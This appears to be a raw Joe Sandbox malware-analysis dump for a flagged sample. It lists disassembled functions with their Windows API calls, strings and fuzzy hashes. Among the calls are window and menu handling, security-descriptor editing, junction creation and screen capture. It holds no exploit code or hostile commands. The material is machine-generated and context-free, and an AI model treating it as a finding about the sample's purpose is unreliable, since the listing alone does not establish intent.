                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: 97ff642242b3e1b97310f6e6a9fd62a61926b8b63a3f5e37db90ce14424076f2
                    • Instruction ID: bbf00f554eb58eef581c465f48a335ed4c3e36ef6635566e12d724182ac4a7cf
                    • Opcode Fuzzy Hash: 97ff642242b3e1b97310f6e6a9fd62a61926b8b63a3f5e37db90ce14424076f2
                    • Instruction Fuzzy Hash: 78A1CE71205306FBDB18DF24C884BEAB7E8FF85355F008629F999D2590D738E945CBA2
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 007AB3DB
                    • _wcscmp.LIBCMT ref: 007AB3EC
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 007AB414
                    • CharUpperBuffW.USER32(?,00000000), ref: 007AB431
                    • _wcscmp.LIBCMT ref: 007AB44F
                    • _wcsstr.LIBCMT ref: 007AB460
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 007AB498
                    • _wcscmp.LIBCMT ref: 007AB4A8
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 007AB4CF
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 007AB518
                    • _wcscmp.LIBCMT ref: 007AB528
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 007AB550
                    • GetWindowRect.USER32(00000004,?), ref: 007AB5B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: ae8c8433e30a36d58070e30d409b537d656604f0a5d02214649693913b6b2350
                    • Instruction ID: 206420b42ffddcba62319ce58d1a498245173ef1189d2811283cde36adf1c820
                    • Opcode Fuzzy Hash: ae8c8433e30a36d58070e30d409b537d656604f0a5d02214649693913b6b2350
                    • Instruction Fuzzy Hash: B581A0710083459BDB04DF50C885FAA7BE8FF85714F04866AFD899A0A3DB38DD49CBA1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: 754a8317e6190280cd4a412bec9720c9c68e1d1053f064aaa79285eac319ba29
                    • Instruction ID: 6353035a3358a954f2a415de57fea5df77be3551265b02b1a4f0a832d718f060
                    • Opcode Fuzzy Hash: 754a8317e6190280cd4a412bec9720c9c68e1d1053f064aaa79285eac319ba29
                    • Instruction Fuzzy Hash: 8831AD32A04209E6DB14EA60DD47AEE77A8BF21751F604229F8A1B11D3EF9E6E08C551
                    APIs
                    • LoadIconW.USER32(00000063), ref: 007AC4D4
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007AC4E6
                    • SetWindowTextW.USER32(?,?), ref: 007AC4FD
                    • GetDlgItem.USER32(?,000003EA), ref: 007AC512
                    • SetWindowTextW.USER32(00000000,?), ref: 007AC518
                    • GetDlgItem.USER32(?,000003E9), ref: 007AC528
                    • SetWindowTextW.USER32(00000000,?), ref: 007AC52E
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007AC54F
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007AC569
                    • GetWindowRect.USER32(?,?), ref: 007AC572
                    • SetWindowTextW.USER32(?,?), ref: 007AC5DD
                    • GetDesktopWindow.USER32 ref: 007AC5E3
                    • GetWindowRect.USER32(00000000), ref: 007AC5EA
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007AC636
                    • GetClientRect.USER32(?,?), ref: 007AC643
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007AC668
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007AC693
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    • Opcode ID: 08da9938697ee66f1357f9a3bb481b629981a1f062a080ee904d6f8fc5321e23
                    • Instruction ID: f1c26ca2a06b741d4f24205fd3c9ed8d5b4ed62bfdfb01bf916816f767346e52
                    • Opcode Fuzzy Hash: 08da9938697ee66f1357f9a3bb481b629981a1f062a080ee904d6f8fc5321e23
                    • Instruction Fuzzy Hash: 85516D70900709EFDB21DFA8DD89B6EBBF5FF44704F104A29E682A25A0D778E914CB54
                    APIs
                    • _memset.LIBCMT ref: 007DA4C8
                    • DestroyWindow.USER32(?,?), ref: 007DA542
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007DA5BC
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007DA5DE
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DA5F1
                    • DestroyWindow.USER32(00000000), ref: 007DA613
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00750000,00000000), ref: 007DA64A
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DA663
                    • GetDesktopWindow.USER32 ref: 007DA67C
                    • GetWindowRect.USER32(00000000), ref: 007DA683
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007DA69B
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007DA6B3
                      • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: f8159524776ff27a36e6a7d3f40c6eb2c33a50c2ca987a85665803f3c0232ba7
                    • Instruction ID: 11b2714402fd253fbf0af62c8026dbc57a7f9271379879de12d24506ea59791b
                    • Opcode Fuzzy Hash: f8159524776ff27a36e6a7d3f40c6eb2c33a50c2ca987a85665803f3c0232ba7
                    • Instruction Fuzzy Hash: A7715A71140205EFD710CF28C849FA67BF9FB88304F08492EF995872A1D779E955CB16
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • DragQueryPoint.SHELL32(?,?), ref: 007DC917
                      • Part of subcall function 007DADF1: ClientToScreen.USER32(?,?), ref: 007DAE1A
                      • Part of subcall function 007DADF1: GetWindowRect.USER32(?,?), ref: 007DAE90
                      • Part of subcall function 007DADF1: PtInRect.USER32(?,?,007DC304), ref: 007DAEA0
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 007DC980
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007DC98B
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007DC9AE
                    • _wcscat.LIBCMT ref: 007DC9DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007DC9F5
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 007DCA0E
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 007DCA25
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 007DCA47
                    • DragFinish.SHELL32(?), ref: 007DCA4E
                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007DCB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                    • API String ID: 169749273-3440237614
                    • Opcode ID: 81416c7a42706095794aeb01d2f84aaf579c65133aa08cd7725bf590ce9f1b56
                    • Instruction ID: f127aeeda094f59d1af222c14b7c115540e88c30b2047ac1f1b254d781001faa
                    • Opcode Fuzzy Hash: 81416c7a42706095794aeb01d2f84aaf579c65133aa08cd7725bf590ce9f1b56
                    • Instruction Fuzzy Hash: 30615A71508301AFC701DF64DC89D9BBBF9FF88710F004A2EF596962A1DB789A49CB52
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 007D46AB
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007D46F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: 59551273684a14693b7348e76b45a6f28b8e5736bbb560019c2cf8960b4bd74a
                    • Instruction ID: 388736a00d7e8ab7cd34d0d0895a6ecfd87f7b49d6c4cd969c18d10c44c917c8
                    • Opcode Fuzzy Hash: 59551273684a14693b7348e76b45a6f28b8e5736bbb560019c2cf8960b4bd74a
                    • Instruction Fuzzy Hash: C7918C34204701DFCB14EF20C855AAAB7A1AF95354F04886DF9965B3A2CB79FD0ACB91
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007DBB6E
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007D9431), ref: 007DBBCA
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DBC03
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007DBC46
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DBC7D
                    • FreeLibrary.KERNEL32(?), ref: 007DBC89
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007DBC99
                    • DestroyIcon.USER32(?,?,?,?,?,007D9431), ref: 007DBCA8
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007DBCC5
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007DBCD1
                      • Part of subcall function 0077313D: __wcsicmp_l.LIBCMT ref: 007731C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 1212759294-1154884017
                    • Opcode ID: 295c840fa44145a0259b06dc7a0ab31cc94255351642237b76d9c3850f2eba20
                    • Instruction ID: dba31cae3a5e634bfa514fc1a9e4446207d4492149f31f4d54b8cbf6858185de
                    • Opcode Fuzzy Hash: 295c840fa44145a0259b06dc7a0ab31cc94255351642237b76d9c3850f2eba20
                    • Instruction Fuzzy Hash: 4161B171600619FAEB14DF64CC45FBE77B8FB08721F108116F919D62D1DBB8AA90DB60
                    APIs
                    • LoadStringW.USER32(00000066,?,00000FFF,007DFB78), ref: 007BA0FC
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 007BA11E
                    • __swprintf.LIBCMT ref: 007BA177
                    • __swprintf.LIBCMT ref: 007BA190
                    • _wprintf.LIBCMT ref: 007BA246
                    • _wprintf.LIBCMT ref: 007BA264
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf$_memmove
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%~
                    • API String ID: 311963372-3531514502
                    • Opcode ID: 9fc1e7de646263b00eee6c025c5fe2d46df9b9a52af9109eb1b2cec47aa1a674
                    • Instruction ID: 54a5c8d3c9ad43912aa65394f23f2675a0629e137153cfa7e3b67b9779da7a04
                    • Opcode Fuzzy Hash: 9fc1e7de646263b00eee6c025c5fe2d46df9b9a52af9109eb1b2cec47aa1a674
                    • Instruction Fuzzy Hash: 75517C71900209FACF19EBE0DD8AEEEB779BF04301F104165F805A21A1EB796F59DB61
                    APIs
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • CharLowerBuffW.USER32(?,?), ref: 007BA636
                    • GetDriveTypeW.KERNEL32 ref: 007BA683
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA6CB
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA702
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA730
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: 3159521f21191b3344d95cdb7c035978af21bf9abb46c321b70c939b2991eb75
                    • Instruction ID: 8260efd39adad0c3bd6995d6d910d901cef0e2a96ff99080df74c46aaf77a255
                    • Opcode Fuzzy Hash: 3159521f21191b3344d95cdb7c035978af21bf9abb46c321b70c939b2991eb75
                    • Instruction Fuzzy Hash: 1E512871104304DFC704EF20D8859AAB7B4FF94719F04896DF89697291DB79EE0ACB52
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007BA47A
                    • __swprintf.LIBCMT ref: 007BA49C
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 007BA4D9
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007BA4FE
                    • _memset.LIBCMT ref: 007BA51D
                    • _wcsncpy.LIBCMT ref: 007BA559
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007BA58E
                    • CloseHandle.KERNEL32(00000000), ref: 007BA599
                    • RemoveDirectoryW.KERNEL32(?), ref: 007BA5A2
                    • CloseHandle.KERNEL32(00000000), ref: 007BA5AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: 7312a74735550501d376482329739c6cf03ffc4e5285ab46824f19425fa62efc
                    • Instruction ID: eecf243ec47967a34e4a39fda1c5db1394a5ff7b633b3cd5dbfc0c2adf8a179f
                    • Opcode Fuzzy Hash: 7312a74735550501d376482329739c6cf03ffc4e5285ab46824f19425fa62efc
                    • Instruction Fuzzy Hash: 5631AEB1500219BBDB209FA0DC48FEB37BCEF88741F1080B6F909D2160E77897548B29
                    APIs
                    • __wsplitpath.LIBCMT ref: 007BDC7B
                    • _wcscat.LIBCMT ref: 007BDC93
                    • _wcscat.LIBCMT ref: 007BDCA5
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007BDCBA
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007BDCCE
                    • GetFileAttributesW.KERNEL32(?), ref: 007BDCE6
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 007BDD00
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007BDD12
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                    • String ID: *.*
                    • API String ID: 34673085-438819550
                    • Opcode ID: 211fd79fc0802dac6a6a34b3d7424c0bb7bf5f245668f8c351fd34415753d4a2
                    • Instruction ID: 10236f58b22e865524a930ea0bffd234cfa1b7aa801403e7c21d0ad300ebd4cc
                    • Opcode Fuzzy Hash: 211fd79fc0802dac6a6a34b3d7424c0bb7bf5f245668f8c351fd34415753d4a2
                    • Instruction Fuzzy Hash: B2816EB16042419FCB34DF64C845AEBB7E8BB88310F19882AF889C7251F678ED45CB52
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007DC4EC
                    • GetFocus.USER32 ref: 007DC4FC
                    • GetDlgCtrlID.USER32(00000000), ref: 007DC507
                    • _memset.LIBCMT ref: 007DC632
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007DC65D
                    • GetMenuItemCount.USER32(?), ref: 007DC67D
                    • GetMenuItemID.USER32(?,00000000), ref: 007DC690
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007DC6C4
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007DC70C
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007DC744
                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007DC779
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                    • String ID: 0
                    • API String ID: 1296962147-4108050209
                    • Opcode ID: 80495c6fe1fb4323ce1d031215b753852bd145bf6069b1e780b95359bc722ab1
                    • Instruction ID: 27de6a99f1002f07cce8533be1a90319b1d23759b4c4341f981da33bbdbe7a1b
                    • Opcode Fuzzy Hash: 80495c6fe1fb4323ce1d031215b753852bd145bf6069b1e780b95359bc722ab1
                    • Instruction Fuzzy Hash: 42817D702083029FD711CF14D984AAABBF8FF88364F14452EF99697391D778E915CBA2
                    APIs
                      • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A8766
                      • Part of subcall function 007A874A: GetLastError.KERNEL32(?,007A822A,?,?,?), ref: 007A8770
                      • Part of subcall function 007A874A: GetProcessHeap.KERNEL32(00000008,?,?,007A822A,?,?,?), ref: 007A877F
                      • Part of subcall function 007A874A: HeapAlloc.KERNEL32(00000000,?,007A822A,?,?,?), ref: 007A8786
                      • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007A879D
                      • Part of subcall function 007A87E7: GetProcessHeap.KERNEL32(00000008,007A8240,00000000,00000000,?,007A8240,?), ref: 007A87F3
                      • Part of subcall function 007A87E7: HeapAlloc.KERNEL32(00000000,?,007A8240,?), ref: 007A87FA
                      • Part of subcall function 007A87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007A8240,?), ref: 007A880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007A8458
                    • _memset.LIBCMT ref: 007A846D
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007A848C
                    • GetLengthSid.ADVAPI32(?), ref: 007A849D
                    • GetAce.ADVAPI32(?,00000000,?), ref: 007A84DA
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007A84F6
                    • GetLengthSid.ADVAPI32(?), ref: 007A8513
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007A8522
                    • HeapAlloc.KERNEL32(00000000), ref: 007A8529
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007A854A
                    • CopySid.ADVAPI32(00000000), ref: 007A8551
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007A8582
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007A85A8
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007A85BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: 60ded839844a243f36295616accd048432d9716884df32fd0de8544cb347d84a
                    • Instruction ID: e0af3210518d0ca78817d357786a58909e8c6939788d2110f6f4354563fc9d1e
                    • Opcode Fuzzy Hash: 60ded839844a243f36295616accd048432d9716884df32fd0de8544cb347d84a
                    • Instruction Fuzzy Hash: B2614C71900209EBDF44DF94DC45AAEBBB9FF45300F04826AF815A7291DB399A25CF61
                    APIs
                    • GetDC.USER32(00000000), ref: 007C76A2
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007C76AE
                    • CreateCompatibleDC.GDI32(?), ref: 007C76BA
                    • SelectObject.GDI32(00000000,?), ref: 007C76C7
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007C771B
